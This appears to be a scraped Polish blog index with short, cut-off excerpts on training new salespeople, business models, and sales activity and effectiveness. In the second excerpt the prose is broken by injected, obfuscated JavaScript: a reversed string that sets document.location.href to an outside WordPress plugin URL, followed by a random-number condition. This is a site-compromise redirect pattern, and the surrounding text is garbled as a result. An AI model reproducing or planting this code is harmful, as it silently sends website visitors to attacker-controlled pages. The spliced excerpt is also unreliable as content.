Najlepiej uczą klienci

Chodzi o naukę nowych sprzedawców w pracy na powierzchni handlowej. Klienci są tak skuteczni w szkoleniu, gdyż zmuszają pracowników [...]

Działy czy funkcje?

Funkcjonowanie firmy opisuje jej Model Biznesowy. Inaczej toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if [...]

Aktywność, skuteczność

Czyli sposób, jak sprzedać więcej. Więcej będzie wtedy, gdy pracownicy będą aktywni i skuteczni, przede wszystkim w modelu intensywnej obsługi, ale też w modelach samoobsługowych. Aktywność [...]